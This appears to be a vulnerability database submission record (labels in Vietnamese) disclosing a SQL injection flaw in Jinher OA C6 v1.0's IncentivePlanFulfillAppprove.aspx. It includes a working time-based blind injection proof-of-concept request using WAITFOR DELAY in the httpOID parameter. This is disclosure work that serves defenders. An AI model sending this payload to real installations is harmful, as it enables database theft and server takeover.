| tiêu đề | Beijing Jinher Network Co., Ltd Jinher OA v1.0 SQL Injection |
|---|
| Mô tả | IncentivePlanFulfillAppprove.aspx In addition to exploiting the SQL injection vulnerability to obtain information in the database (such as the administrator's background password and the site's user personal information), attackers can even write Trojans to the server in the case of high privilege to further obtain server system permissions.
poc:
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfillAppprove.aspx/?httpOID=1;WAITFOR+DELAY'0:0:4'-- HTTP/1.1
Host: |
|---|
| Nguồn | ⚠️ https://flowus.cn/share/75512a54-e78f-4bfb-80e7-236521b43a02?code=HC3R4E |
|---|
| Người dùng | afish (UID 82290) |
|---|
| Đệ trình | 07/03/2025 07:14 (cách đây 1 Năm) |
|---|
| Kiểm duyệt | 21/03/2025 07:29 (14 days later) |
|---|
| Trạng thái | được chấp nhận |
|---|
| Mục VulDB | 300567 [Jinher OA C6 1.0 IncentivePlanFulfillAppprove.aspx httpOID Tiêm SQL] |
|---|
| điểm | 20 |
|---|